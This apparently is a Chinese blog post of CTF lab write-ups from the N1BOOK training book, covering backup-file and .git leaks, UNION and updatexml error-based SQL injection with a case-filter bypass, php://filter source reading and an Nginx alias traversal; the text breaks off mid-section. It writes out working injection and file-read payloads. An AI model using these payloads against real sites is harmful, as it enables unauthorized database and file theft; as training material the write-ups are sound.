<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="next-config" data-name="main" type="application/json">{&quot;hostname&quot;:&quot;woopokyuk.github.io&quot;,&quot;root&quot;:&quot;&#x2F;&quot;,&quot;images&quot;:&quot;&#x2F;images&quot;,&quot;scheme&quot;:&quot;Pisces&quot;,&quot;version&quot;:&quot;8.4.0&quot;,&quot;exturl&quot;:false,&quot;sidebar&quot;:{&quot;position&quot;:&quot;left&quot;,&quot;display&quot;:&quot;post&quot;,&quot;padding&quot;:18,&quot;offset&quot;:12},&quot;copycode&quot;:false,&quot;bookmark&quot;:{&quot;enable&quot;:false,&quot;color&quot;:&quot;#222&quot;,&quot;save&quot;:&quot;auto&quot;},&quot;fancybox&quot;:false,&quot;mediumzoom&quot;:false,&quot;lazyload&quot;:false,&quot;pangu&quot;:false,&quot;comments&quot;:{&quot;style&quot;:&quot;tabs&quot;,&quot;active&quot;:null,&quot;storage&quot;:true,&quot;lazyload&quot;:false,&quot;nav&quot;:null},&quot;motion&quot;:{&quot;enable&quot;:true,&quot;async&quot;:false,&quot;transition&quot;:{&quot;post_block&quot;:&quot;fadeIn&quot;,&quot;post_header&quot;:&quot;fadeInDown&quot;,&quot;post_body&quot;:&quot;fadeInDown&quot;,&quot;coll_header&quot;:&quot;fadeInLeft&quot;,&quot;sidebar&quot;:&quot;fadeInUp&quot;}},&quot;prism&quot;:false,&quot;i18n&quot;:{&quot;placeholder&quot;:&quot;搜索...&quot;,&quot;empty&quot;:&quot;没有找到任何搜索结果：${query}&quot;,&quot;hits_time&quot;:&quot;找到 ${hits} 个搜索结果（用时 ${time} 毫秒）&quot;,&quot;hits&quot;:&quot;找到 ${hits} 个搜索结果&quot;},&quot;path&quot;:&quot;&#x2F;search.xml&quot;,&quot;localsearch&quot;:{&quot;enable&quot;:true,&quot;trigger&quot;:&quot;auto&quot;,&quot;top_n_per_article&quot;:1,&quot;unescape&quot;:false,&quot;preload&quot;:false}}</script>
<meta name="description" content="参考《从0到1 CTFer成长之路》   [第一章 web入门]常见的搜集先验知识：常见的敏感文件 gedit备份文件，格式为filename~，比如index.php~   vim备份文件，格式为.filename.swp或者*.swo或者*.swn，比如.index.php.swp   robots.txt   还有filename.bak文件  方法 地址后加&#x2F;index.php~   &#x2F;.">
<meta property="og:type" content="article">
<meta property="og:title" content="N1BOOK">
<meta property="og:url" content="https://woopokyuk.github.io/2020/11/11/N1BOOK/index.html">
<meta property="og:site_name" content="WooPokyuk&#39;s Blog">
<meta property="og:description" content="参考《从0到1 CTFer成长之路》   [第一章 web入门]常见的搜集先验知识：常见的敏感文件 gedit备份文件，格式为filename~，比如index.php~   vim备份文件，格式为.filename.swp或者*.swo或者*.swn，比如.index.php.swp   robots.txt   还有filename.bak文件  方法 地址后加&#x2F;index.php~   &#x2F;.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109223222659-122979701.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109225055125-364536216.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109224118439-1125637828.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109224223273-908316035.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109172615955-1966111900.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222425300-439745981.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222705671-1100399964.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222803648-1320351443.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111105652234-783984521.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111110017446-1664980143.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111110249600-1227706058.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111111203589-1163518685.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111112032432-1319004183.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111112630199-158278303.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111113011837-1925798496.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111113143857-1970053562.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201114180246608-43938250.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201114175943865-1170585348.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122233423320-7334493.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122234140730-1675769603.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122234308612-2127113186.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235414244-1226071747.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235551248-284421726.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235936482-283322537.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201123000206027-1673938152.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201123000312454-163132210.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115180608275-1525964878.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115181019047-1546308797.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115180652404-1677628879.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115181356049-426897552.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235618945-1220381986.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235644275-1101729838.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235800682-1951172374.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235824630-1004736249.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111115333510-1380860265.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204026170-317361439.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204429141-497488314.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204527280-1969476305.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204818419-1089495331.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205501285-1592593146.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205403033-1732093910.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205701121-1124011515.png">
<meta property="article:published_time" content="2020-11-11T03:54:00.000Z">
<meta property="article:modified_time" content="2021-05-09T17:08:25.331Z">
<meta property="article:author" content="WooPokyuk">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="N1BOOK">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109223222659-122979701.png">


<link rel="canonical" href="https://woopokyuk.github.io/2020/11/11/N1BOOK/">



<script class="next-config" data-name="page" type="application/json">{&quot;sidebar&quot;:&quot;&quot;,&quot;isHome&quot;:false,&quot;isPost&quot;:true,&quot;lang&quot;:&quot;zh-CN&quot;,&quot;comments&quot;:true,&quot;permalink&quot;:&quot;https:&#x2F;&#x2F;woopokyuk.github.io&#x2F;2020&#x2F;11&#x2F;11&#x2F;N1BOOK&#x2F;&quot;,&quot;path&quot;:&quot;2020&#x2F;11&#x2F;11&#x2F;N1BOOK&#x2F;&quot;,&quot;title&quot;:&quot;N1BOOK&quot;}</script>

<script class="next-config" data-name="calendar" type="application/json">&quot;&quot;</script>
<title>N1BOOK | WooPokyuk's Blog</title><script src="/js/config.js"></script>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">WooPokyuk's Blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%90%9C%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">[第一章 web入门]常见的搜集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%88%E9%AA%8C%E7%9F%A5%E8%AF%86%EF%BC%9A%E5%B8%B8%E8%A7%81%E7%9A%84%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="nav-number">1.1.</span> <span class="nav-text">先验知识：常见的敏感文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.</span> <span class="nav-text">方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-%E7%B2%97%E5%BF%83%E7%9A%84%E5%B0%8F%E6%9D%8E"><span class="nav-number">2.</span> <span class="nav-text">[第一章 web入门]粗心的小李</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95-1"><span class="nav-number">2.1.</span> <span class="nav-text">方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-SQL%E6%B3%A8%E5%85%A5-1"><span class="nav-number">3.</span> <span class="nav-text">[第一章 web入门]SQL注入-1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-SQL%E6%B3%A8%E5%85%A5-2"><span class="nav-number">4.</span> <span class="nav-text">[第一章 web入门]SQL注入-2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%88%E9%AA%8C%E7%9F%A5%E8%AF%86"><span class="nav-number">4.1.</span> <span class="nav-text">先验知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95-2"><span class="nav-number">4.2.</span> <span class="nav-text">方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-afr-1"><span class="nav-number">5.</span> <span class="nav-text">[第一章 web入门]afr_1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%88%E9%AA%8C%E7%9F%A5%E8%AF%86-1"><span class="nav-number">5.1.</span> <span class="nav-text">先验知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95-3"><span class="nav-number">5.2.</span> <span class="nav-text">方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-web%E5%85%A5%E9%97%A8-afr-2"><span class="nav-number">6.</span> <span class="nav-text">[第一章 web入门]afr_2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%88%E9%AA%8C%E7%9F%A5%E8%AF%86-2"><span class="nav-number">6.1.</span> <span class="nav-text">先验知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95-4"><span class="nav-number">6.2.</span> <span class="nav-text">方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%BA%94%E7%AB%A0-CTF%E4%B9%8BRE%E7%AB%A0-Hello-RE"><span class="nav-number">7.</span> <span class="nav-text">[第五章 CTF之RE章]Hello, RE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%85%AD%E7%AB%A0-CTF%E4%B9%8BPWN%E7%AB%A0-stack"><span class="nav-number">8.</span> <span class="nav-text">[第六章 CTF之PWN章]stack</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="WooPokyuk"
      src="/images/logo.jpeg">
  <p class="site-author-name" itemprop="name">WooPokyuk</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://woopokyuk.github.io/2020/11/11/N1BOOK/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/logo.jpeg">
      <meta itemprop="name" content="WooPokyuk">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="WooPokyuk's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          N1BOOK
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-11-11 11:54:00" itemprop="dateCreated datePublished" datetime="2020-11-11T11:54:00+08:00">2020-11-11</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-05-10 01:08:25" itemprop="dateModified" datetime="2021-05-10T01:08:25+08:00">2021-05-10</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p><font face="楷体" size="4">参考《从0到1 CTFer成长之路》</font>  </p>
<h2 id="第一章-web入门-常见的搜集"><a href="#第一章-web入门-常见的搜集" class="headerlink" title="[第一章 web入门]常见的搜集"></a>[第一章 web入门]常见的搜集</h2><h3 id="先验知识：常见的敏感文件"><a href="#先验知识：常见的敏感文件" class="headerlink" title="先验知识：常见的敏感文件"></a>先验知识：常见的敏感文件</h3><ol>
<li>gedit备份文件，格式为<code>filename~</code>，比如<code>index.php~</code>  </li>
<li>vim备份文件，格式为<code>.filename.swp</code>或者<code>*.swo</code>或者<code>*.swn</code>，比如<code>.index.php.swp</code>  </li>
<li>robots.txt  </li>
<li>还有<code>filename.bak</code>文件</li>
</ol>
<h3 id="方法"><a href="#方法" class="headerlink" title="方法"></a>方法</h3><ol>
<li>地址后加<code>/index.php~</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109223222659-122979701.png">  </li>
<li><code>/.index.php.swp</code>会即刻下载备份文件，可通过<code>vi index.php</code>建一个只有空格的文件，然后通过<code>vim -r index.php</code>进行恢复即可得到<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109225055125-364536216.png">  </li>
<li><code>/robots.txt</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109224118439-1125637828.png"><br>查看这个文本文件<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109224223273-908316035.png"><br>综上可得  </li>
</ol>
<blockquote>
<p>n1book{info_1s_v3ry_imp0rtant_hack}</p>
</blockquote>
<h2 id="第一章-web入门-粗心的小李"><a href="#第一章-web入门-粗心的小李" class="headerlink" title="[第一章 web入门]粗心的小李"></a>[第一章 web入门]粗心的小李</h2><p>git泄露<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109172615955-1966111900.png">  </p>
<h3 id="方法-1"><a href="#方法-1" class="headerlink" title="方法"></a>方法</h3><ol>
<li>借助<a target="_blank" rel="noopener" href="https://github.com/WangYihang/GitHacker">GitHacker工具</a>  </li>
<li><code>git clone https://github.com/WangYihang/GitHacker.git</code>  </li>
<li><code>cd GitHacker</code>  </li>
<li><code>python Githacker.py http://0fcbe3ec-471a-452a-9e5f-953c5026eb18.node3.buuoj.cn/.git</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222425300-439745981.png">  </li>
<li>进入恢复后的文件夹<code>cd 0fcbe3ec-471a-452a-9e5f-953c5026eb18_node3_buuoj_cn_</code>，有个index.html<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222705671-1100399964.png">  </li>
<li>浏览器打开index.html即可拿到flag<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201109222803648-1320351443.png">  <blockquote>
<p>n1book{git_looks_s0_easyfun}</p>
</blockquote>
</li>
</ol>
<h2 id="第一章-web入门-SQL注入-1"><a href="#第一章-web入门-SQL注入-1" class="headerlink" title="[第一章 web入门]SQL注入-1"></a>[第一章 web入门]SQL注入-1</h2><ol>
<li>打开题目链接可以看到<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111105652234-783984521.png">  </li>
<li>试试<code>id=1+1</code>的回显，发现和<code>id=1</code>结果相同，所以不是数字型注入，可能是字符型<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111110017446-1664980143.png">  </li>
<li>尝试<code>id=1a</code>发现和<code>id=1</code>结果相同，所以确实是字符型<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111110249600-1227706058.png">  </li>
<li>尝试用<code>id=1&#39;#</code>，单引号用于闭合前面的单引号，井号用于注释后面预置的单引号。这里<font face="楷体" color="red">注意：#一定要用URL编码，即%23</font>，所以实际上需要输入<code>id=1&#39;%23</code>单引号会被自动转成%27<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111111203589-1163518685.png">  </li>
<li>可以成功显示  </li>
<li>优先尝试UNION注入<code>id=-1&#39;union select 1,2,3%23</code>，其中-1是为了使第一行记录无法被查询到，当然，除了-1也可以是一个很大的值比如1024、100等。后面的查询语句是尝试测试哪些字段可以回显<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44840696/article/details/89166154">参考</a><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111112032432-1319004183.png">  </li>
<li>所以将数字2改成我们想查询的内容：所有表名<code>group_concat(table_name)</code>，<code>group_concat</code>是用<code>,</code>联合多行记录的函数。所以为查询本数据库的其他所有表名，需<code>id=-1&#39;union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23</code>，随即看到fl4g<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111112630199-158278303.png">  </li>
<li>查询fl4g中的字段名，<code>id=-1&#39;union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#39;fl4g&#39;%23</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111113011837-1925798496.png">  </li>
<li>获取fllllag的内容，<code>id=-1&#39;union select 1,fllllag,3 from fl4g%23</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111113143857-1970053562.png">  <blockquote>
<p>n1book{union_select_is_so_cool}</p>
</blockquote>
</li>
</ol>
<h2 id="第一章-web入门-SQL注入-2"><a href="#第一章-web入门-SQL注入-2" class="headerlink" title="[第一章 web入门]SQL注入-2"></a>[第一章 web入门]SQL注入-2</h2><h3 id="先验知识"><a href="#先验知识" class="headerlink" title="先验知识"></a>先验知识</h3><ol>
<li>有的网站会开启错误调试信息方便开发者调试，可以利用报错信息进行<strong>报错注入</strong>  </li>
<li>updatexml第二个参数应为合法XPATH路径，否则会在引发报错的同时输出传入的参数  </li>
<li>dual用于测试数据库是否可以正常使用  </li>
</ol>
<h3 id="方法-2"><a href="#方法-2" class="headerlink" title="方法"></a>方法</h3><ol>
<li>在连接后加上<code>/login.php</code>，右键查看源码<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201114180246608-43938250.png"><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201114175943865-1170585348.png">  </li>
<li>回到登录页面，打开Burp Suite，安装方法<a target="_blank" rel="noopener" href="https://www.pianshen.com/article/8533363563/#20_Burp_Suite__57">参考</a>  </li>
<li>推荐浏览器插件：SwitchyOmega，可以省去每次设置代理的步骤，使用BurpSuite时，点击插件选择对应Burp Suite的代理即可<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122233423320-7334493.png">  </li>
<li>在login界面随便输入用户名和密码如1,1然后点击登录  </li>
<li>可以在Burp Suite中Proxy-&gt;HTTP history看到记录<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122234140730-1675769603.png">  </li>
<li>CTRL+R，发送到Repeater，在login.php后添加<code>?tips=1</code>，点击Go，看到报错<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122234308612-2127113186.png">  </li>
<li>用dual进行测试<code>name=1&#39;and updatexml(1,concat(0x7e,(select 1 from dual)),1)#&amp;pass=xxxx</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235414244-1226071747.png">  </li>
<li>说明存在过滤，将select改成selEct重新发送后回显正常<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235551248-284421726.png">  </li>
<li>之后的操作与与SQL注入1同理，将selEct后的1改为group_concat(table_name)，dual改为information_schema.tables where table_schema=database()以查看所有表名<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201122235936482-283322537.png">  </li>
<li>仍与SQL注入1同理，查看fl4g的字段，分别改为group_concat(column_name)和information_schema.columns where table_name=’fl4g’<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201123000206027-1673938152.png">  </li>
<li>获取flag，<code>selEct flag from fl4g</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201123000312454-163132210.png">  <blockquote>
<p>n1book{login_sqli_is_nice}</p>
</blockquote>
</li>
</ol>
<h2 id="第一章-web入门-afr-1"><a href="#第一章-web入门-afr-1" class="headerlink" title="[第一章 web入门]afr_1"></a>[第一章 web入门]afr_1</h2><h3 id="先验知识-1"><a href="#先验知识-1" class="headerlink" title="先验知识"></a>先验知识</h3><ol>
<li>PHP向用户提供的指定待打开文件的方式，是一个文件流  </li>
<li>PHP的Filter机制，可对目前的协议进行一定的处理，比如将当前文件流的内容进行Base64编码。使用方法<code>php://filter/read=convert.base64-encode/resource=xxx</code>  </li>
<li>利用Filter机制，构造形如以上的攻击数据可以读取文件，拿到各种文件的源码  </li>
</ol>
<h3 id="方法-3"><a href="#方法-3" class="headerlink" title="方法"></a>方法</h3><ol>
<li>点击题目链接<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115180608275-1525964878.png">  </li>
<li><code>p=php://filter/read=convert.base64-encode/resource=hello</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115181019047-1546308797.png">  <blockquote>
<p>PD9waHAKCmVjaG8gImhlbGxvIHdvcmxkISI7</p>
</blockquote>
</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://tool.oschina.net/encrypt?type=3">Base64解码</a>结果为  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;hello world!&quot;</span>;</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><p>尝试改p，发现<code>p=flag</code>时有回显，所以应该存在这么个文件<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115180652404-1677628879.png">  </p>
</li>
<li><p><code>p=php://filter/read=convert.base64-encode/resource=flag</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115181356049-426897552.png">  </p>
<blockquote>
<p>PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9</p>
</blockquote>
</li>
<li><p>解码结果为  </p>
</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">die</span>(<span class="string">&#x27;no no no&#x27;</span>);</span><br><span class="line"><span class="comment">//n1book&#123;afr_1_solved&#125;</span></span><br></pre></td></tr></table></figure>

<h2 id="第一章-web入门-afr-2"><a href="#第一章-web入门-afr-2" class="headerlink" title="[第一章 web入门]afr_2"></a>[第一章 web入门]afr_2</h2><h3 id="先验知识-2"><a href="#先验知识-2" class="headerlink" title="先验知识"></a>先验知识</h3><p>Nginx错误配置可能产生目录穿越漏洞，比如：  </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location /<span class="keyword">static</span> &#123;</span><br><span class="line">    alias /home/myapp/<span class="keyword">static</span>/;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由于static后没有加/，如果用户请求/static../，拼接到alias进会变成/home/myapp/static/../会穿越到myapp目录  </p>
<h3 id="方法-4"><a href="#方法-4" class="headerlink" title="方法"></a>方法</h3><ol>
<li>点击题目链接<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235618945-1220381986.png">  </li>
